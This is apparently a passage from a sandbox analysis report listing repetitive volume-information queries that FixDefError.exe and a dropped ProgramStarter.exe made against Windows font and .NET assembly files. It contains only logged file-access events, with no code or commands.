Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
